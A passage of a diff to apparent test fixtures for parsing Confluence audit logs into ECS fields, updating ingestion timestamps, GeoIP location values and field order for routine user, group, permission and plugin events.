"lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15980,7 +15002,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:08:08.222686633Z", + "ingested": "2021-12-14T14:34:31.513272168Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.924Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -16070,20 +15092,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16091,7 +15107,7 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-08T15:08:08.222688718Z", + "ingested": "2021-12-14T14:34:31.513272765Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.860Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"to\":\"test user\"},{\"key\":\"Email\",\"i18nKey\":\"Email\",\"to\":\"test.user@example.com\"},{\"key\":\"Username\",\"i18nKey\":\"Username\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -16170,20 +15186,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16191,7 +15201,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222690609Z", + "ingested": "2021-12-14T14:34:31.513273405Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16261,20 +15271,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16282,7 +15286,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222692481Z", + "ingested": "2021-12-14T14:34:31.513273962Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16352,20 +15356,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16373,7 +15371,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222694353Z", + "ingested": "2021-12-14T14:34:31.513274356Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.250Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16443,20 +15441,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16464,7 +15456,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222696222Z", + "ingested": "2021-12-14T14:34:31.513274756Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.246Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16534,20 +15526,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16555,7 +15541,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222698119Z", + "ingested": "2021-12-14T14:34:31.513275143Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.243Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16625,20 +15611,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16646,7 +15626,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222700018Z", + "ingested": "2021-12-14T14:34:31.513275542Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.241Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16716,20 +15696,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16737,7 +15711,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222701889Z", + "ingested": "2021-12-14T14:34:31.513275934Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.239Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16807,20 +15781,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -16828,7 +15796,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222703758Z", + "ingested": "2021-12-14T14:34:31.513276386Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.217Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16868,31 +15836,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-23T00:35:03.201Z", "ecs": { "version": "1.12.0" 
@@ -16908,9 +15851,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:08:08.222705637Z", + "ingested": "2021-12-14T14:34:31.513276770Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.201Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -16925,6 +15884,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-users", "id": "confluence-users" 
@@ -16950,31 +15912,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-23T00:35:03.188Z", "ecs": { "version": "1.12.0" @@ -16990,9 +15927,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:08:08.222707507Z", + "ingested": "2021-12-14T14:34:31.513277166Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.188Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -17007,6 +15960,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-administrators", "id": "confluence-administrators" @@ -17140,20 +16096,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -17161,7 +16111,7 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-08T15:08:08.222709397Z", + "ingested": "2021-12-14T14:34:31.513277566Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.109Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"action\":\"User directory created\"},\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"key\":\"Encryption type\",\"i18nKey\":\"Encryption 
type\",\"to\":\"atlassian-security\"},{\"key\":\"ID\",\"i18nKey\":\"ID\",\"to\":\"327681\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"INTERNAL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17212,20 +16162,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17233,7 +16177,7 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-08T15:08:08.222711266Z", + "ingested": "2021-12-14T14:34:31.513277975Z", "original": "{\"timestamp\":\"2021-11-23T00:34:46.735Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -17282,20 +16226,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17303,7 +16241,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:08:08.222713141Z", + "ingested": "2021-12-14T14:34:31.513278362Z", "original": "{\"timestamp\":\"2021-11-23T00:34:45.732Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17352,20 +16290,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -17373,7 +16305,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:08:08.222715004Z", + "ingested": "2021-12-14T14:34:31.513278740Z", "original": "{\"timestamp\":\"2021-11-23T00:34:44.466Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17440,7 +16372,7 @@ }, "event": { "action": "audit.logging.summary.user.renamed", - "ingested": "2021-12-08T15:08:08.222716897Z", + "ingested": "2021-12-14T14:34:31.513279180Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.142Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"audit.logging.changed.value.username\",\"from\":\"asdf\",\"to\":\"asdf123\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -17511,7 +16443,7 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-08T15:08:08.222718799Z", + "ingested": "2021-12-14T14:34:31.513279584Z", "original": "{\"timestamp\":\"2021-11-28T17:06:11.805Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
